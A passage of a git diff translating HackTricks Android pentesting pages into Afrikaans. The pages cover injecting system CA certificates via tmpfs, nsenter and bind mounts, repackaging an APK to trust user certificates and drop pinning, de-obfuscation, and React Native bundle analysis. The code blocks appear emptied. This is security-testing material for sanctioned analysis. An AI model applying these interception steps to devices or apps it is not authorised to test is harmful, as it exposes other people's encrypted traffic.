/apex/com.android.conscrypt/cacerts & done wait # Launched in parallel - wait for completion here echo "System certificate injected" ``` +### Bind-montasie deur NSEnter -### Bind-mounting through NSEnter - -1. **Setting Up a Writable Directory**: Initially, a writable directory is established by mounting a `tmpfs` over the existing non-APEX system certificate directory. This is achieved with the following command: - +1. **Opstel van 'n Skryfbare Gids**: Aanvanklik word 'n skryfbare gids opgestel deur 'n `tmpfs` oor die bestaande nie-APEX-stelselertifikaatgids te monteer. Dit word bereik met die volgende bevel: ```bash - mount -t tmpfs tmpfs /system/etc/security/cacerts +mount -t tmpfs tmpfs /system/etc/security/cacerts ``` +2. **Voorbereiding van CA-sertifikate**: Na die opstel van die skryfbare gids moet die CA-sertifikate wat jy wil gebruik, gekopieer word na hierdie gids. Dit mag die kopie van die verstek sertifikate vanaf `/apex/com.android.conscrypt/cacerts/` behels. Dit is noodsaaklik om die toestemmings en SELinux-etikette van hierdie sertifikate dienooreenkomstig aan te pas. -2. **Preparing CA Certificates**: Following the setup of the writable directory, the CA certificates that one intends to use should be copied into this directory. This might involve copying the default certificates from `/apex/com.android.conscrypt/cacerts/`. It's essential to adjust the permissions and SELinux labels of these certificates accordingly. - -3. **Bind Mounting for Zygote**: Utilizing `nsenter`, one enters the Zygote's mount namespace. Zygote, being the process responsible for launching Android applications, requires this step to ensure that all applications initiated henceforth utilize the newly configured CA certificates. The command used is: - +3. **Bind Montering vir Zygote**: Deur gebruik te maak van `nsenter`, betree jy die monteer-namespace van Zygote. Zygote, as die proses wat verantwoordelik is vir die begin van Android-toepassings, vereis hierdie stap om te verseker dat alle toepassings wat hierna geïnisieer word, die nuut gekonfigureerde CA-sertifikate gebruik. Die gebruikte bevel is: ```bash nsenter --mount=/proc/$ZYGOTE_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts ``` +Dit verseker dat elke nuwe app wat begin, sal voldoen aan die opgedateerde CA-sertifikate-instelling. -This ensures that every new app started will adhere to the updated CA certificates setup. - -4. **Applying Changes to Running Apps**: To apply the changes to already running applications, `nsenter` is again used to enter each app's namespace individually and perform a similar bind mount. The necessary command is: - +4. **Veranderinge toepas op lopende apps**: Om die veranderinge op reeds lopende programme toe te pas, word `nsenter` weer gebruik om individueel in elke app se namespace in te gaan en 'n soortgelyke bind mount uit te voer. Die nodige bevel is: ```bash nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts ``` +5. **Alternatiewe Benadering - Sagte Herlaai**: 'n Alternatiewe metode behels die uitvoer van die bind mount op die `init` proses (PID 1), gevolg deur 'n sagte herlaai van die bedryfstelsel met die `stop && start` opdragte. Hierdie benadering sal die veranderinge oor alle namespaces versprei, wat die noodsaaklikheid om elke lopende app individueel te adresseer, vermy. Hierdie metode word egter oor die algemeen minder verkies as gevolg van die ongerief van herlaaiing. -5. **Alternative Approach - Soft Reboot**: An alternative method involves performing the bind mount on the `init` process (PID 1) followed by a soft reboot of the operating system with `stop && start` commands. This approach would propagate the changes across all namespaces, avoiding the need to individually address each running app. However, this method is generally less preferred due to the inconvenience of rebooting. - -## References +## Verwysings * [https://httptoolkit.com/blog/android-14-install-system-ca-certificate/](https://httptoolkit.com/blog/android-14-install-system-ca-certificate/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/mobile-pentesting/android-app-pentesting/intent-injection.md b/mobile-pentesting/android-app-pentesting/intent-injection.md index 84a296d7a..c4a65fa0f 100644 --- a/mobile-pentesting/android-app-pentesting/intent-injection.md +++ b/mobile-pentesting/android-app-pentesting/intent-injection.md @@ -1,35 +1,31 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**Take a look to: [https://blog.oversecured.com/Android-Access-to-app-protected-components/](https://blog.oversecured.com/Android-Access-to-app-protected-components/)** +**Neem 'n kykie na: [https://blog.oversecured.com/Android-Access-to-app-protected-components/](https://blog.oversecured.com/Android-Access-to-app-protected-components/)**
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md b/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md index b27ef0b66..64997932f 100644 --- a/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md +++ b/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md @@ -1,91 +1,85 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -Some applications don't like user downloaded certificates, so in order to inspect web traffic for some apps we actually have to decompile the application & add a few things & recompile it. +Sommige toepassings hou nie van sertifikate wat deur gebruikers afgelaai is nie, so om webverkeer vir sommige toepassings te ondersoek, moet ons eintlik die toepassing dekompilieer en 'n paar dinge byvoeg en dit weer saamstel. -# Automatic +# Outomaties -The tool [**https://github.com/shroudedcode/apk-mitm**](https://github.com/shroudedcode/apk-mitm) will **automatically** make the necessary changes to the application to start capturing the requests and will also disable certificate pinning (if any). +Die instrument [**https://github.com/shroudedcode/apk-mitm**](https://github.com/shroudedcode/apk-mitm) sal die nodige veranderinge aan die toepassing **outomaties** maak om die versoek vas te vang en sal ook sertifikaatpennetrekking deaktiveer (indien van toepassing). -# Manual +# Handmatig -First we decompile the app: `apktool d *file-name*.apk` +Eerstens dekompilieer ons die toepassing: `apktool d *lêernaam*.apk` ![](../../.gitbook/assets/img9.png) -Then we go into the **Manifest.xml** file & scroll down to the `<\application android>` tag & we are going to add the following line if it isn't already there: +Dan gaan ons na die **Manifest.xml**-lêer en rol af na die `<\application android>`-etiket en ons gaan die volgende lyn byvoeg as dit nog nie daar is nie: `android:networkSecurityConfig="@xml/network_security_config` -Before adding: +Voordat ons byvoeg: ![](../../.gitbook/assets/img10.png) -After adding: +Nadat ons byvoeg: ![](../../.gitbook/assets/img11.png) -Now go into the **res/xml** folder & create/modify a file named network\_security\_config.xml with the following contents: - +Gaan nou na die **res/xml**-vouer en skep/wysig 'n lêer met die naam network\_security\_config.xml met die volgende inhoud: ```markup - - - - - - - - - - + + + + + + + + + + ``` - -Then save the file & back out of all the directories & rebuild the apk with the following command: `apktool b *folder-name/* -o *output-file.apk*` +Stoor dan die lêer en keer terug uit al die gide en bou die apk weer op met die volgende bevel: `apktool b *gids-naam/* -o *uitvoer-lêer.apk*` ![](../../.gitbook/assets/img12.png) -Finally, you need just to **sign the new application**. [Read this section of the page Smali - Decompiling/\[Modifying\]/Compiling to learn how to sign it](smali-changes.md#sing-the-new-apk). +Laastens moet jy net die nuwe aansoek **onderteken**. [Lees hierdie gedeelte van die bladsy Smali - Decompiling/\[Modifying\]/Compiling om te leer hoe om dit te onderteken](smali-changes.md#sing-the-new-apk).
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
- - diff --git a/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md b/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md index 0736258a0..82d1d759b 100644 --- a/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md +++ b/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md @@ -1,68 +1,64 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Manual **De-obfuscation Techniques** +## Handleiding **De-obfuscation-tegnieke** -In the realm of **software security**, the process of making obscured code understandable, known as **de-obfuscation**, is crucial. This guide delves into various strategies for de-obfuscation, focusing on static analysis techniques and recognizing obfuscation patterns. Additionally, it introduces an exercise for practical application and suggests further resources for those interested in exploring more advanced topics. +In die domein van **sagteware-sekuriteit** is die proses om versluierde kode verstaanbaar te maak, bekend as **de-obfuscation**, van kritieke belang. Hierdie gids ondersoek verskeie strategieë vir de-obfuscation, met die klem op statiese analise-tegnieke en die herkenning van versluieringspatrone. Daarbenewens bied dit 'n oefening vir praktiese toepassing en stel dit verdere hulpbronne voor vir diegene wat belangstel om meer gevorderde onderwerpe te verken. -### **Strategies for Static De-obfuscation** +### **Strategieë vir Statische De-obfuscation** -When dealing with **obfuscated code**, several strategies can be employed depending on the nature of the obfuscation: +Wanneer dit kom by **versluierde kode**, kan verskeie strategieë gebruik word, afhangende van die aard van die versluiering: -- **DEX bytecode (Java)**: One effective approach involves identifying the application's de-obfuscation methods, then replicating these methods in a Java file. This file is executed to reverse the obfuscation on the targeted elements. -- **Java and Native Code**: Another method is to translate the de-obfuscation algorithm into a scripting language like Python. This strategy highlights that the primary goal is not to fully understand the algorithm but to execute it effectively. +- **DEX-bytekode (Java)**: Een effektiewe benadering behels die identifisering van die toepassing se de-obfuscation-metodes, gevolg deur die replicering van hierdie metodes in 'n Java-lêer. Hierdie lêer word uitgevoer om die versluiering op die geteikende elemente om te keer. +- **Java en Inheemse Kode**: 'n Ander metode is om die de-obfuscation-algoritme te vertaal na 'n skripsietaal soos Python. Hierdie strategie beklemtoon dat die primêre doel nie is om die algoritme ten volle te verstaan nie, maar om dit doeltreffend uit te voer. -### **Identifying Obfuscation** +### **Identifisering van Versluiering** -Recognizing obfuscated code is the first step in the de-obfuscation process. Key indicators include: +Die herkenning van versluierde kode is die eerste stap in die de-obfuscation-proses. Sleutelindikators sluit in: -- The **absence or scrambling of strings** in Java and Android, which may suggest string obfuscation. -- The **presence of binary files** in the assets directory or calls to `DexClassLoader`, hinting at code unpacking and dynamic loading. -- The use of **native libraries alongside unidentifiable JNI functions**, indicating potential obfuscation of native methods. +- Die **afwesigheid of vermenging van strings** in Java en Android, wat moontlik dui op string-versluiering. +- Die **teenwoordigheid van binêre lêers** in die bates-gids of oproepe na `DexClassLoader`, wat dui op kode-ontpakkings en dinamiese laai. +- Die gebruik van **inheemse biblioteke saam met onidentifiseerbare JNI-funksies**, wat moontlike versluiering van inheemse metodes aandui. -## **Dynamic Analysis in De-obfuscation** +## **Dinamiese Analise in De-obfuscation** -By executing the code in a controlled environment, dynamic analysis **allows for the observation of how the obfuscated code behaves in real time**. This method is particularly effective in uncovering the inner workings of complex obfuscation patterns that are designed to hide the true intent of the code. +Deur die kode in 'n beheerde omgewing uit te voer, maak dinamiese analise dit moontlik om die gedrag van die versluierde kode in werklike tyd waar te neem. Hierdie metode is veral doeltreffend om die innerlike werking van komplekse versluieringspatrone bloot te lê wat ontwerp is om die ware bedoeling van die kode te verberg. -### **Applications of Dynamic Analysis** +### **Toepassings van Dinamiese Analise** -- **Runtime Decryption**: Many obfuscation techniques involve encrypting strings or code segments that only get decrypted at runtime. Through dynamic analysis, these encrypted elements can be captured at the moment of decryption, revealing their true form. -- **Identifying Obfuscation Techniques**: By monitoring the application's behavior, dynamic analysis can help identify specific obfuscation techniques being used, such as code virtualization, packers, or dynamic code generation. -- **Uncovering Hidden Functionality**: Obfuscated code may contain hidden functionalities that are not apparent through static analysis alone. Dynamic analysis allows for the observation of all code paths, including those conditionally executed, to uncover such hidden functionalities. +- **Tydontsleuteling**: Baie versluieringstegnieke behels die versleuteling van strings of kode-segmente wat slegs tydens uitvoering ontsluit word. Deur dinamiese analise kan hierdie versleutelde elemente vasgevang word op die oomblik van ontsluiting, wat hul ware vorm onthul. +- **Identifisering van Versluieringstegnieke**: Deur die gedrag van die toepassing te monitor, kan dinamiese analise help om spesifieke versluieringstegnieke te identifiseer wat gebruik word, soos kode-virtualisering, pakkers of dinamiese kode-generering. +- **Blootstelling van Versteekte Funksionaliteit**: Versluierde kode kan versteekte funksionaliteit bevat wat nie deur statiese analise alleen sigbaar is nie. Dinamiese analise maak dit moontlik om alle kodepaaie waar te neem, insluitend diegene wat kondisioneel uitgevoer word, om sulke versteekte funksionaliteit bloot te lê. -## References and Further Reading +## Verwysings en Verdere Leeswerk * [https://maddiestone.github.io/AndroidAppRE/obfuscation.html](https://maddiestone.github.io/AndroidAppRE/obfuscation.html) -* BlackHat USA 2018: “Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Library” \[[video](https://www.youtube.com/watch?v=s0Tqi7fuOSU)] - * This talk goes over reverse engineering one of the most complex anti-analysis native libraries I’ve seen used by an Android application. It covers mostly obfuscation techniques in native code. -* REcon 2019: “The Path to the Payload: Android Edition” \[[video](https://recon.cx/media-archive/2019/Session.005.Maddie_Stone.The_path_to_the_payload_Android_Edition-J3ZnNl2GYjEfa.mp4)] - * This talk discusses a series of obfuscation techniques, solely in Java code, that an Android botnet was using to hide its behavior. +* BlackHat USA 2018: "Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Library" \[[video](https://www.youtube.com/watch?v=s0Tqi7fuOSU)] +* Hierdie praatjie gaan oor die omgekeerde ingenieurswese van een van die mees komplekse anti-analise inheemse biblioteke wat ek gesien het wat deur 'n Android-toepassing gebruik word. Dit dek hoofsaaklik versluieringstegnieke in inheemse kode. +* REcon 2019: "The Path to the Payload: Android Edition" \[[video](https://recon.cx/media-archive/2019/Session.005.Maddie_Stone.The_path_to_the_payload_Android_Edition-J3ZnNl2GYjEfa.mp4)] +* Hierdie praatjie bespreek 'n reeks versluieringstegnieke, uitsluitlik in Java-kode, wat deur 'n Android-botnet gebruik is om sy gedrag te verberg.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/mobile-pentesting/android-app-pentesting/react-native-application.md b/mobile-pentesting/android-app-pentesting/react-native-application.md index 3bc0075d9..3d470d5ad 100644 --- a/mobile-pentesting/android-app-pentesting/react-native-application.md +++ b/mobile-pentesting/android-app-pentesting/react-native-application.md @@ -1,68 +1,62 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# React Native Application Analysis +# Analise van React Native-toepassing -To confirm if the application was built on the React Native framework, follow these steps: +Om te bevestig of die toepassing op die React Native-raamwerk gebou is, volg hierdie stappe: -1. Rename the APK file with a zip extension and extract it to a new folder using the command `cp com.example.apk example-apk.zip` and `unzip -qq example-apk.zip -d ReactNative`. +1. Hernoem die APK-lêer met 'n zip-uitbreiding en pak dit uit na 'n nuwe gids met die opdrag `cp com.example.apk example-apk.zip` en `unzip -qq example-apk.zip -d ReactNative`. -2. Navigate to the newly created ReactNative folder and locate the assets folder. Inside this folder, you should find the file `index.android.bundle`, which contains the React JavaScript in a minified format. +2. Navigeer na die nuutgeskepte ReactNative-gids en vind die bates-gids. Binne hierdie gids moet jy die lêer `index.android.bundle` vind, wat die React JavaScript in 'n geminifiseerde formaat bevat. -3. Use the command `find . -print | grep -i ".bundle$"` to search for the JavaScript file. - -To further analyze the JavaScript code, create a file named `index.html` in the same directory with the following code: +3. Gebruik die opdrag `find . -print | grep -i ".bundle$"` om na die JavaScript-lêer te soek. +Om die JavaScript-kode verder te analiseer, skep 'n lêer met die naam `index.html` in dieselfde gids met die volgende kode: ```html 